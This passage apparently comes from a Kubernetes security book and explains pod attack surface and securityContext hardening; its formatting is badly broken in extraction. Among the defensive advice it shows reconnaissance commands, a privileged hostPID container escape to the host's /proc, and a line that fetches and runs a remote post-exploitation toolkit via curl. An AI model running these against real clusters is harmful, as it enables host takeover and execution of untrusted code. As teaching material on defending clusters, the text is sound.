any.any.svc.cluster.local.30
IN SRV0
6
53
kube-dns.kube-system.svc.cluster.local. any.any.svc.cluster.local.30
IN SRV0
6
80
frontend-external.default.svc.cluster.local. any.any.svc.cluster.local.30
IN SRV0
6
80
frontend.default.svc.cluster.local. any.any.svc.cluster.local.30
IN SRV0
6
443
kubernetes.default.svc.cluster.local. any.any.svc.cluster.local.30
IN SRV0
6
3550
productcatalogservice.default.svc.cluster.local.# ...
For all service endpoints and names:
[email protected]:/[
0]
# dig +noall +answer srv any.any.any.svc.cluster.local | sort --human-numeric-sort --key 7
any.any.any.svc.cluster.local.30
IN SRV0
3
53
192-168-155-129.kube-dns.kube-system.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
53
192-168-156-130.kube-dns.kube-system.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
3550
192-168-156-133.productcatalogservice.default.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
5050
192-168-156-131.checkoutservice.default.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
6379
192-168-156-136.redis-cart.default.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
6443
10-0-1-1.kubernetes.default.svc.cluster.local. any.any.any.svc.cluster.local.30
IN SRV0
3
7000
192-168-156-135.currencyservice.default.svc.cluster.local.# ...
To return an IPv4 address based on the query:
[email protected]:/[
0]
# dig +noall +answer 1-3-3-7.default.pod.cluster.local
1-3-3-7.default.pod.cluster.local.23
IN A 1.3.3.7
Kubernetes API server service IP information is mounted into the pod’s environment by default:
[email protected]:~ [0]# env | grep KUBE KUBERNETES_SERVICE_PORT_HTTPS=443 KUBERNETES_SERVICE_PORT=443 KUBERNETES_PORT_443_TCP=tcp://10.7.240.1:443 KUBERNETES_PORT_443_TCP_PROTO=tcp KUBERNETES_PORT_443_TCP_ADDR=10.7.240.1 KUBERNETES_SERVICE_HOST=10.7.240.1 KUBERNETES_PORT=tcp://10.7.240.1:443 KUBERNETES_PORT_443_TCP_PORT=443 [email protected]:~ [0]# curl -k https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}/version { "major": "1", "minor": "19+", "gitVersion": "v1.19.9-gke.1900", "gitCommit": "008fd38bf3dc201bebdd4fe26edf9bf87478309a", # ...
The response matches the API server’s /version
endpoint.
Detect Kubernetes API servers with this nmap script and the following function:
nmap-kube-apiserver()
{
local
REGEX
=
"major.*gitVersion.*buildDate"
local
ARGS
=
"
${
@
:-$(
kubectl config view --minify|
awk'/server:/{print $2}'
|
sed -E -e's,^https?://,,'
-e's,:, -p ,g'
)
}
"
nmap --open -d--script
=
http-get--script-args
"
http-get.path=/version,
http-get.match="
${
REGEX
}
",
http-get.showResponse,
http-get.forceTls
"
${
ARGS
}
}
This pod is running with an empty securityContext, which means that without admission controllers mutating the configuration at deployment time, the container can run a root-owned process and has all capabilities available to it:
securityContext
:
{}
Exploiting the capability landscape involves an understanding of the kernel’s flags, and Stefano Lanaro’s guide provides a comprehensive overview.
Different capabilities may have particular impact on a system, and CAP_SYS_ADMIN
and CAP_BPF
are particularly
enticing to an attacker. Notable capabilities you should be cautious about granting include:
CAP_DAC_OVERRIDE
, CAP_CHOWN
, CAP_DAC_READ_SEARCH
, CAP_FORMER
, CAP_SETFCAP
: bypass filesystem permissions
CAP_SETUID
, CAP_SETGID
: become the root user
CAP_NET_RAW
: read network traffic
CAP_SYS_ADMIN
: filesystem mount permission
CAP_SYS_PTRACE
: all-powerful debugging of other processes
CAP_SYS_MODULE
: load kernel modules to bypass controls
CAP_PERFMON
, CAP_BPF
: access deep-hooking BPF systems
These are the precursors for many container breakouts. As Figure 2-11, Brad Geesaman points out, processes want to be free! And an adversary will take advantage of anything within the pod they can use to escape.
CAP_NET_RAW
is enabled by default in runc
, and enables UDP (which bypasses TCP service meshes like Istio), ICMP, and
ARP poisoning attacks. Aqua found DNS poisoning attacks
against Kubernetes DNS, and the net.ipv4.ping_group_range
sysctl
flag means
it should be dropped when needed for ICMP.
Some container breakouts requiring root
and/or CAP_SYS_ADMIN
, CAP_NET_RAW
, CAP_BPF
, or CAP_SYS_MODULE
to
function:
/proc/self/exe
(described in Chapter 5)
Subpath volume mount traversal (described in Chapter 5)
CVE-2016-5195 (read-only memory copy-on-write race condition, aka DirtyCow, and detailed in “Architecting Containerised Applications for Resilience”).
CVE-2020-14386 (an unprivileged memory corruption bug that requires CAP_NET_RAW
)
CVE-2021-30465 (runc mount destinations symlink-exchange swap to mount outside the rootfs, limited by use of unprivileged user)
CVE-2021-22555 (Netfilter heap out-of-bounds write that requires CAP_NET_RAW
)
CVE-2021-31440 (eBPF out of bounds access to the Linux kernel requiring root or CAP_BPF
, and CAPS_SYS_MODULE
)
@andreyknvl kernel bugs and core_pattern
escape
When there’s no breakout, root capabilities are still required for a number of other attacks, such as CVE-2020-10749 (Kubernetes CNI plugin MitM attacks via IPv6 rogue router advertisements)
The excellent Compendium of Container Escapes goes into more detail on some of these attacks.
We enumerate the options available in a securityContext
for a pod to defend itself
from hostile containers at in the runtime policies section.
Service Accounts are JWTs (JSON Web Tokens) and are used for authorisation by a pods. The default service account shouldn’t be given any permissions, and by default comes with no authorisation.
A pod’s serviceAccount
configuration defines its access privileges with the API server,
see the server accounts section for the details. The service account is mounted into
all pod replicas, and which share the single “workload identity”.
serviceAccount
:
default
serviceAccountName
:
default
Segregating duty in this way reduces the blast radius if a pod is compromised: limiting an attacker post-intrusion is a primary goal of policy controls.
The scheduler is responsible for allocating a pod workload to a node. It looks as follows:
schedulerName
:
default-scheduler
tolerations
:
-
effect
:
NoExecute
key
:
node.kubernetes.io/not-ready
operator
:
Exists
tolerationSeconds
:
300
-
effect
:
NoExecute
key
:
node.kubernetes.io/unreachable
operator
:
Exists
tolerationSeconds
:
300
A hostile scheduler could conceivably exfiltrate data or workloads from the cluster,
but requires the cluster to be compromised in order to add it to the control
plane. It would be easier to schedule a privileged container and root the control plane
kubelets
.
Here we are using a bound service account token, defined in YAML as a projected service account token (instead of a standard service account). The Kubelet protects this against exfiltration by regularly rotating it (configured for every 3600 seconds, or one hour), so it’s only of limited use if stolen. An attacker with persistence is still able to use this value, and can observe it rotating, so this only protects the service account after the attack has completed.
volumes
:
-
name
:
kube-api-access-p282h
projected
:
defaultMode
:
420
sources
:
-
serviceAccountToken
:
expirationSeconds
:
3600
path
:
token
-
configMap
:
items
:
-
key
:
ca.crt
path
:
ca.crt
name
:
kube-root-ca.crt
-
downwardAPI
:
items
:
-
fieldRef
:
apiVersion
:
v1
fieldPath
:
metadata.namespace
path
:
namespace
Volumes are a rich source of potential data for an attacker, and you should ensure that standard security practices like discretionary access control (DAC, e.g. files and permissions) is correctly configured.
The downwardAPI reflects Kubernetes-level values into the containers in the pod, and is useful to expose things like the pod’s name, namespace, UID, and labels and annotations into the container. It’s capabilities are listed in the docs.
The container is just Linux and will not protect incorrectly configured data.
Network information about the pod is useful to debug containers without services, or that aren’t responding as they should, but an attacker might use this information to connect directly to a pod without scanning the network.
status
:
hostIP
:
10.0.1.3
phase
:
Running
podIP
:
192.168.155.130
podIPs
:
-
ip
:
192.168.155.130
A pod is more likely to be compromised if a securityContext
is not configured, or is too permissive. It is your
most effective tool to prevent container breakout.
After gaining an RCE into a running pod, the security context is the first line of defensive configuration you have available to a defender. It has access to kernel switches that can be set individually. Additional Linux Security Modules can be configured with fine-grained policies that prevent hostile applications taking advantage of your systems.
Docker’s containerd
has a default seccomp profile that has prevented some zero-day attacks against the container
runtime by blocking system calls in the kernel. From Kubernetes v1.22 you should enable this by default for
all runtimes with the --seccomp-default
Kubelet flag. In some cases workloads may not run with the default
profile: observability or security tools may require low-level kernel access. These workloads should have custom
seccomp profiles written (rather than resorting to running them Unconfined
, which allows any system call).
Here’s an example of a fine-grained seccmop profile loaded from the host’s filesystem under
/var/lib/kubelet/seccomp
:
securityContext
:
seccompProfile
:
type
:
Localhost
localhostProfile
:
profiles/fine-grained.json
Seccomp is for system calls, but SELinux and AppArmor can monitor and enforce policy in userspace too, protecting files, directories, and devices.
SELinux configuration is able to block most container breakouts (excluding with a label-based approach to filesystem and process access) as it doesn’t allow containers to write anywhere but their own filesystem, nor to read other directories, and comes enabled on Openshift and Red Hat Linuxes.
AppArmor can similarly monitor and prevent many attacks in Debian Linuxes. If AppArmor is enabled
then cat /sys/module/apparmor/parameters/enabled
returns Y
, and it can be used in pod definitions:
metadata
:
annotations
:
container.apparmor.security.beta.kubernetes.io/hello
:
localhost/k8s-apparmor-example-deny-write
The privileged
flag was quoted as being “the most dangerous flag in the history of computing” by Liz Rice, but why are
privileged containers so dangerous? Because they leave the process namespace enabled to give the illusion of
containerisation, but actually disable all security features.
“Privileged” is a specific securityContext
configuration: all but the process namespace is disabled, virtual filesystems
are unmasked, LSMs are disabled, and all capabilities are granted.
Running as a non-root user without capabilities, and setting AllowPrivilegeEscalation
to false provides a robust
protection against many privilege escalations.
spec
:
containers
:
-
image
:
controlplane/hack
securityContext
:
allowPrivilegeEscalation
:
false
The granularity of security contexts means each property of the configuration must be tested to ensure it is not set: as a defender by configuring admission control and testing YAML; as an attacker with a dynamic test (or amicontained) at runtime.
We explore how to detect privileges inside a container later in this chapter.
Sharing namespaces with the host also reduces the isolation of the container and opens it to greater potential risk. Any mounted filesystems effectively add to the mount namespace.
Ensure your pods ``securityContext``’s are correct and your systems will be safer against known attacks.
Kubesec is a simple tool to validate the security of a Kubernetes resource.
It returns a risk score for the resource, and advises on how to tighten the security context:
$
cat<<EOF > kubesec-test.yaml
apiVersion: v1
kind: Pod
metadata:
name: kubesec-demo
spec:
containers:
- name: kubesec-demo
image: gcr.io/google-samples/node-hello:1.0
securityContext:
readOnlyRootFilesystem: true
EOF
$
docker run -i kubesec/kubesec:2.11.1 scan - < kubesec-test.yaml[
{
"object"
:"Pod/kubesec-demo.default"
,"valid"
:true
,"fileName"
:"STDIN"
,"message"
:"Passed with a score of 1 points"
,"score"
: 1,"scoring"
:{
"passed"
:[
{
"id"
:"ReadOnlyRootFilesystem"
,"selector"
:"containers[] .securityContext .readOnlyRootFilesystem == true"
,"reason"
:"An immutable root filesystem can prevent malicious binaries being added to PATH and inc
rease attack cost"
,"points"
: 1}
]
,"advise"
:[
{
"id"
:"ApparmorAny"
,"selector"
:".metadata .annotations ."container.apparmor.security.beta.kubernetes.io/nginx""
,"reason"
:"Well defined AppArmor policies may provide greater protection from unknown threats. WARNING: NOT PRODUCTION READY"
,"points"
: 3}
,{
"id"
:"ServiceAccountName"
,"selector"
:".spec .serviceAccountName"
,"reason"
:"Service accounts restrict Kubernetes API access and should be configured with least privilege"
,"points"
: 3}
,{
"id"
:"SeccompAny"
,"selector"
:".metadata .annotations ."container.seccomp.security.alpha.kubernetes.io/pod""
,"reason"
:"Seccomp profiles set minimum privilege and secure against unknown threats"
,"points"
: 1}
,# ...
Kubesec.io documents practical changes to make to your security context, and we’ll document some of them here.
Shopify’s excellent kubeaudit provides similar functionality for all resources in a cluster.
The NSA published a Kubernetes Hardening Guidance document that recommends a hardened set of securityContext standards. It recommends scanning for vulnerabilities and misconfigurations, least privilege, good RBAC and IAM, network firewalling and encryption, and “to periodically review all Kubernetes settings and use vulnerability scans to help ensure risks are appropriately accounted for and security patches are applied”.
Assigning least privilege to a container in a pod is the responsibility of the securityContext
PodSecurityPolicy maps onto the configuration flags available in a Pod or Container’s securityContext
Let’s explore these in more detail using the kubesec
static analysis tool, and the selectors it uses to interrogate your Kubernetes resources:
containers[] .securityContext .privileged
A privileged container running is potentially a bad day for your security team. Privileged containers disable
namespaces (except process
) and LSMs, grant all capabilities, expose the host’s devices through /dev
, and generally
make things insecure by default. This is the first thing an attacker looks for in a newly compromised pod.
.spec .hostPID
hostPID
allows traversal from the container to the host through the /proc
filesystem, which symlinks other
processes’ root filesystems. To read from the host’s process namespace privileged
is needed as well:
[email protected] $ kubectl run privileged-and-hostpid --restart=Never -ti --rm
--image lol --overrides
'{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
/ $ grep PRETTY_NAME /etc/*release*
PRETTY_NAME="Alpine Linux v3.13"
/ $ ps faux | head
PID USER TIME COMMAND
1 root 0:07 /usr/lib/systemd/systemd noresume noswap cros_efi
2 root 0:00 [kthreadd]
3 root 0:00 [rcu_gp]
4 root 0:00 [rcu_par_gp]
6 root 0:00 [kworker/0:0H-kb]
9 root 0:00 [mm_percpu_wq]
10 root 0:00 [ksoftirqd/0]
11 root 1:33 [rcu_sched]
12 root 0:00 [migration/0]
/ $ grep PRETTY_NAME /proc/1/root/etc/*rel*
/proc/1/root/etc/os-release:PRETTY_NAME="Container-Optimized OS from Google"
start a privileged container and share the host process namespace
check the distribution version inside the container
verify we’re in the host’s process namespace (we can see PID 1, and kernel helper processes)
check the distribution version of the host, via the /proc
filesystem
Without privileged
, the host process namespac is inaccessible to root in the container:
/ $
grep PRETTY_NAME /proc/1/root/etc/*release*
grep: /proc/1/root/etc/*release*: Permission denied
In this case the attacker is limited to searching the filesystem or memory as their UID allows, hunting for key material or sensitive data.
.spec .hostNetwork
Host networking access allows us to sniff traffic or send fake traffic over the host adapter (but only if we have
permission to do so, enabled by root
and CAP_NET_RAW
or CAP_NET_ADMIN
), and evade network policy (which depends on
traffic originating from the expected source IP of the adapter in the pod’s network namespace).
It also grants access to services bound to the host’s loopback adapter (localhost
in the root network namespace) that
traditionally was considered a security boundary. Server Side Request Forgery (SSRF) attacks have reduced
the incidence of this pattern, but it may still exist (Kubernetes’ API server --insecure-port
used this pattern
until it was deprecated in v1.10 and finally removed in v1.20).
.spec .hostAliases
Permits pods to override their local /etc/hosts
files. This may have more operational implications (like not being
updated in a timely manner and causing an outage) than security connotations.
.spec .hostIPC
Gives the pod access to the host’s Interprocess Communication namespace, where it may be able to interfere with
trusted processes on the host. It’s likely this will enable simple host compromise via /usr/bin/ipcs
or files in shared memory at /dev/shm
.
containers[] .securityContext .runAsNonRoot
The root user has special permissions and privileges in a Linux system, and this is no different within a container (although they’re less).
Preventing root from owning the procesess inside the container is a simple and effective security measure. It stops many of the container breakout attacks listed in this book, and adheres to standard and established Linux security practice.
containers[] .securityContext .runAsUser > 10000
In addition to preventing root running processes, enforcing high UIDs for containerised processes lowers the risk of breakout without user namespaces: if the user in the conatiner (e.g. 12345) has an equivalent UID on the host (that is, also 12345), and the user in the container is able to reach them through mounted volume or shared namespace, then resources may accidentally be shared and allow container breakout (e.g. filesystem permissions and authorisation checks).
containers[] .securityContext .readOnlyRootFilesystem
Immutability is not a security boundary as code can be downloaded from the internet and run by an interpreter
(such as Bash, PHP, and Java) without using the filesystem, as the bashark
post-exploitation toolkit shows:
[email protected]:/tmp[
0]
# source <(curl -s
https://raw.githubusercontent.com/redcode-labs/Bashark/master/bashark.sh)
__________ .__ __ ________ _______\_
_____\_
____ _____|
|
__ _____ _______|
|
__ ___ __\_
____
_
|
|
_/\_
_/ ___/
|
\
__\
_ __
|
/ /
/
/ / ____/ / /_
|
|
/ __
\_\_
__|
Y/
__|
|
/
</ /
\_
/
|
______ /(
____ /____ >___|
(
____ /__|
|
__|
_
\_
/ /
\_
______/
\_
____ //
/
/
/
/
/
/
/
/
/
[
*]
Type'help'
to show available commands bashark_2.0$
Filesystem locations like /tmp
and /dev/shm
will probably always be writable to support application
behaviour, and so read-only filesystems cannot be relied upon as a security boundary. Immutability will prevent
against some drive-by and automated attacks, but is not a robust security boundary.
Intrusion detection tools such as falco
and tracee
can detect new Bash shells spawned in a container (or any
non-allowlisted applications). Additionally tracee
can
detect in-memory execution of malware that attempts to hide
itself by observing /proc/pid/maps
for memory that was once writeable but is now executable.
We look at Falco in more detail in Chapter 9.
containers[] .securityContext .capabilities .drop | index("ALL")
You should always drop all capabilities and only re-add those that your application needs to operate.
containers[] .securityContext .capabilities .add | index("SYS_ADMIN")
The presence of this capability is a red flag: try to find another way to deploy any container that requires this, or deploy into a dedicated namespace with custom security rules to limit the impact of compromise.
containers[] .resources .limits .cpu, .memory
Limiting the total amount of memory available to a container prevents denial of service attacks taking out the host machine, as the container dies first,
containers[] .resources .requests .cpu, .memory
Requesting resources helps the scheduler to “bin pack” resources effectively, and doesn’t have any security connotations further to a hostile API client trying to squeeze more pods onto a specific node.
.spec .volumes[] .hostPath .path
A writable /var/run/docker.sock
host mount allows breakout to the host. Any filesystem that an attacker can write
a symlink to is vulnerable, and an attacker can use that path to explore and exfiltrate from the host.
The Captain and crew have had a fruitless raid, but this is not the last we will hear of their escapades.
If we zoom in on the relationship between a single pod and the host in Figure 2-12, we can see the services offered to the container by the Kubelet and potential security boundaries that may keep an adversary at bay.
As we progress through this book, we will see how these components interact, and we will witness Captain Hashjack’s efforts to exploit them.
There are multiple layers of configuration to secure for a pod to be used safely, and the workloads you run are the soft underbelly of Kubernetes security.
The pod is the first line of defence and the most important part of a cluster to protect. Application code changes frequently and is likely to be a source of potentially exploitable bugs.
To extend the anchor and chain metaphor, a cluster is only a strong as its weakest link. In order to be provably secure, you must use robust configuration testing, preventative control and policy in the pipeline and admission control, and runtime intrusion detection—as nothing is infallible.